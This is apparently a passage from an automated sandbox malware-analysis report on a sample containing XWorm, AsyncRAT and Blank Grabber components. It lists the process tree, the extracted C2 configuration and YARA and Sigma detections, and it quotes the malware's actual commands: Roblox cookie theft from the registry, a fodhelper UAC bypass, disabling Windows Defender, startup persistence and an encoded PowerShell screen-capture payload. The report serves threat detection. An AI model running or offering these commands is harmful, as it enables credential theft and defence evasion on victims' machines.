          • conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tree.com (PID: 4568 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
        • cmd.exe (PID: 7448 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tree.com (PID: 7976 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
        • cmd.exe (PID: 5440 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 1240 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • cmd.exe (PID: 5268 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tree.com (PID: 1816 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
        • cmd.exe (PID: 3648 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tree.com (PID: 2848 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
        • cmd.exe (PID: 2100 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7832 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 3832 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7344 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
        • Conhost.exe (PID: 3832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • XClient.exe (PID: 7084 cmdline: C:\Users\user\AppData\Roaming\XClient.exe MD5: 7439CC991A9A756C41153B8E9121BAAB)
  • SecurityHealthSystray.exe (PID: 3948 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe" MD5: DBBD2127D1030E4C9548FDF7DE9983A7)
    • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7980 cmdline: cmd.exe /C fodhelper MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • fodhelper.exe (PID: 8108 cmdline: fodhelper MD5: 85018BE1FD913656BC9FF541F017EACD)
      • fodhelper.exe (PID: 7844 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 85018BE1FD913656BC9FF541F017EACD)
      • fodhelper.exe (PID: 7840 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 85018BE1FD913656BC9FF541F017EACD)
        • SecurityHealthSystray.exe (PID: 7812 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe" MD5: DBBD2127D1030E4C9548FDF7DE9983A7)
          • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • XClient.exe (PID: 6540 cmdline: "C:\Users\user\AppData\Roaming\XClient.exe" MD5: 7439CC991A9A756C41153B8E9121BAAB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["147.185.221.23"], "Port": 33942, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\XClient.exeJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Roaming\XClient.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0xfc4e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0xfceb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0xfe00:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xebac:$cnc4: POST / HTTP/1.1
    C:\Users\user\AppData\Roaming\eternal.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Roaming\eternal.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xfc4e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xfceb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xfe00:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xebac:$cnc4: POST / HTTP/1.1
      C:\Users\user\AppData\Local\Temp\_MEI44642\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        Click to see the 4 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000008.00000003.1934849918.00000237A5ED6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000005.00000003.1524758278.00000139887E3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 28 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  0.2.EternalPredictor.exe.3d22330.2.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                    0.2.EternalPredictor.exe.3d22330.2.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0xfc4e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0xfceb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0xfe00:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0xebac:$cnc4: POST / HTTP/1.1
                    0.2.EternalPredictor.exe.3d10cf0.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
                      0.2.EternalPredictor.exe.3d10cf0.1.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                      • 0xde4e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      • 0xdeeb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                      • 0xe000:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                      • 0xcdac:$cnc4: POST / HTTP/1.1
                      2.0.eternal.exe.bc0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                        Click to see the 17 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Bypass UAC via Fodhelper.exe
                        Source: Process startedAuthor: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community: Data: Command: "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe" , CommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, ParentCommandLine: "C:\Windows\system32\fodhelper.exe" , ParentImage: C:\Windows\System32\fodhelper.exe, ParentProcessId: 7840, ParentProcessName: fodhelper.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe" , ProcessId: 7812, ProcessName: SecurityHealthSystray.exe
                        Sigma detected: Files With System Process Name In Unsuspected Locations
                        Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\skuld.exe, ProcessId: 3872, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\program.exe" , ParentImage: C:\Users\user\AppData\Roaming\program.exe, ParentProcessId: 2360, ParentProcessName: program.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'", ProcessId: 4920, ProcessName: cmd.exe
                        Sigma detected: Powershell Defender Disable Scan Feature
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\program.exe" , ParentImage: C:\Users\user\AppData\Roaming\program.exe, ParentProcessId: 2360, ParentProcessName: program.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 4940, ProcessName: cmd.exe
                        Sigma detected: Suspicious Encoded PowerShell Command Line
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                        Sigma detected: Suspicious PowerShell Encoded Command Patterns
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                        Sigma detected: Suspicious Startup Folder Persistence
                        Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\program.exe, ProcessId: 2360, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr
                        Sigma detected: Change PowerShell Policies to an Insecure Level
                        Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgA